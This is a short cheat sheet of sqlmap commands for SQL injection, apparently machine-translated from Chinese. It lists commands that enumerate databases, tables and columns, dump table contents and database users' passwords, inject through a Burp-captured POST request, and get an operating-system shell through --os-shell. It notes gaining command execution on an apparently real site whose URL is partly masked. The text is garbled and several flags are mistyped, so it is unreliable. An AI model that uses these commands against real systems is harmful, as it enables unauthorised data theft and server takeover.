Basic commands to inject MySQL
MSSQL access directly explodes the table. and you know it.
BT5 in front of the words will add Python
Sqlmap.py-u URL--dbs//Explode database
Sqlmap.py-u URL--current-db//explode current Library
Sqlmap.py-u URL--current-user//explode Current user
Sqlmap.py-u URL--users View User rights
Sqlmap.py-u URL--tables-d database//Explode table segment
Sqlmap.py-u URL--columns-t table Segment-D database//Explode field
Sqlmap.py-u url--dump-c field-T table Segment-D database//guess solution
Sqlmap.py-u URL--dump--start=1--stop=3-c field-T table Segment-D database//guess 1 to 3 fields
You can turn it back on.
sqlmap.py-u URL judgment
sqlmap.py-u URL-- Is-dba-v This is to determine whether the current database consumer is DBA
sqlmap.py-u URL--users-v 0 The purpose of this sentence is to enumerate the users of the database
sqlmap.py-u URL--passwords-v 0 The purpose of this sentence is to obtain the password of the database user
sqlmap.py-u URL--privileges-v 0 This is the right to determine the current permissions
sqlmap.py-u URL- -dbs-v 0 The purpose of this sentence is to list all databases
sqlmap.py-u url--tables-d ' table ' explode table
sqlmap.py-u url--columns-t ' table '-d ' database ' burst
sqlmap.py -u URL--dump-t ' table '--start 1--stop 4-v 0 Here is the 2nd to 4th line of the query
sqlmap.py-u URL--dump -all-v 0
Post Injection
The first is to use the burp to capture the packet and then sqlmap-r to detect the injection.
First Burp grab the post packet to put the captured information into the Sqlmap directory under the name Clay.txt instead
Sqlmap.py-r post.txt//start post injection
Sqlmap.py-r Post--dbs
The second is relatively simple, directly using the Sqlmap--forms this parameter can be
Sqlmap.py-u "url"--forms
Sqlmap.py-u "url"--forms--os-shell
Surprised to find that the injection point can be executed by command
Permissions: NT AUTHORITY\NETWORK SERVICE
Here we export all the libraries, I think this is the former time rumors of the off-pants bar, when performing this operation, will be all the contents of the table into the current directory, look clear, but it takes a long time.
Sqlmap-u "http://www.xxxxxe.com/xxxxsphp?class=news&id=5&page=1&catalog_id=2"--users--password explosion user Password
Sqlmap Command Notes